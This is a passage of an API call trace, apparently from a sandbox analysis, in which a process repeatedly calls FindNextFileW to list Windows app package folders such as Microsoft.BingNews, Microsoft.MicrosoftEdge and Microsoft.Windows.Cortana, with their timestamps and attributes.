ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0xc89dadb, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.BingFinance_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.BIN")) returned 1 [0177.004] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49716ce0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xa0d44ca, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0xa0d44ca, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.BingNews_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.BIN")) returned 1 [0177.004] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45133c70, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x556dcf4, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0x556dcf4, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.BingSports_8wekyb3d8bbwe", cAlternateFileName="MICROS~3.BIN")) returned 1 [0177.004] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x428d1e5f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x31f6a27, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0x31f6a27, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.BingWeather_8wekyb3d8bbwe", cAlternateFileName="MICROS~4.BIN")) returned 1 [0177.004] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66d77fef, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7d0704ba, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7d17b532, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.BioEnrollment_cw5n1h2txyewy", cAlternateFileName="MICROS~1.BIO")) returned 1 [0177.004] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3df817ee, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x131e209, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0x131e209, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.CommsPhone_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.COM")) returned 1 [0177.004] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a9f4516, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xffc77b6a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xffc77b6a, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.ConnectivityStore_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.CON")) returned 1 [0177.004] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x767aed3b, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x767fb19c, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x767fb19c, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.CredDialogHost_cw5n1h2txyewy", cAlternateFileName="MICROS~1.CRE")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe87ff8e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xfe8f2692, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfe8f2692, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.DesktopAppInstaller_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.DES")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388df267, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xfd81bc01, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfd81bc01, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Getstarted_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.GET")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x695414de, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7b2c8ffc, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7b44678d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.LockApp_cw5n1h2txyewy", cAlternateFileName="MICROS~1.LOC")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3517066f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xfbf856cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfbf856cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Messaging_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.MES")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ee3238, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xf9f55962, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf9f55962, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", cAlternateFileName="MIC2FD~1.MIC")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a401dd0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdc4fe9ef, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xdc92abfb, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.MIC")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x317ff574, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xf9428887, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf9428887, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.MIC")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d8aac99, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xdba259a9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xdba259a9, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", cAlternateFileName="MICROS~3.MIC")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd8bcdb78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd8c4028f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd8c4028f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", cAlternateFileName="MICROS~4.MIC")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd7d33450, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd7dcbdba, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd7dcbdba, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.MSPaint_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.MSP")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf27b049c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x33b4c3b0, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x33b4c3b0, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_8")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104f57a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x33dfacc4, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x33dfacc4, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.1_8")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebee37c7, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xebf2fc88, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xebf2fc88, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.3_8")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x266a19e6, ftCreationTime.dwHighDateTime=0x1d32719, ftLastAccessTime.dwLowDateTime=0x34036ffb, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x34036ffb, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.6_8")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2252fd4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x34273354, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x34273354, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.0_8")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd08196, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x344af7fa, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x344af7fa, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.1_8")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb85500d, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xeb8a14cb, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xeb8a14cb, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.3_8")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x94b424e4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x94bb4bf1, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x94bb4bf1, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.4_8")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28b9688c, ftCreationTime.dwHighDateTime=0x1d32719, ftLastAccessTime.dwLowDateTime=0x3509b345, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3509b345, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.6_8")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28e030d8, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x8d747894, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x8d974b3f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Office.OneNote_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.ONE")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f04703, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd6e72acf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd6e72acf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Office.Sway_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.SWA")) returned 1 [0177.005] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5cb721c, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd5dc228d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd5dc228d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.OneConnect_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.ONE")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x236d6f79, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4774ad5, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd4774ad5, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.People_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.PEO")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f649af8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7f7086bb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7f7086bb, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.PPIProjection_cw5n1h2txyewy", cAlternateFileName="MICROS~1.PPI")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b585e2b, ftCreationTime.dwHighDateTime=0x1d32719, ftLastAccessTime.dwLowDateTime=0x8b121dc6, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x8b2eb9cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.ENG")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3186030, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x88a3d6df, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x88e698d0, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.SkypeApp_kzf8qxf38zg5c", cAlternateFileName="MICROS~1.SKY")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd30f451d, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd3166c27, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd3166c27, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.STO")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3433d3f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x35ff46f7, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x35ff46f7, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.00_")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6065f77, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xc66f4772, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xc66f4772, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Wallet_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.WAL")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x771d0d50, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x77243451, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x77243451, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", cAlternateFileName="MICROS~1.CHX")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6bfb93d2, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7962cbd4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7975de94, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", cAlternateFileName="MICROS~1.ASS")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74ba56ed, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd05a99ea, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd05a99ea, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", cAlternateFileName="MICROS~1.CLO")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7659308d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xddff7455, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xddff7455, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", cAlternateFileName="MICROS~2.CON")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdade5d03, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xdade5d03, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.Cortana_cw5n1h2txyewy", cAlternateFileName="MICROS~1.COR")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75e71ae4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", cAlternateFileName="MICROS~1.HOL")) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, 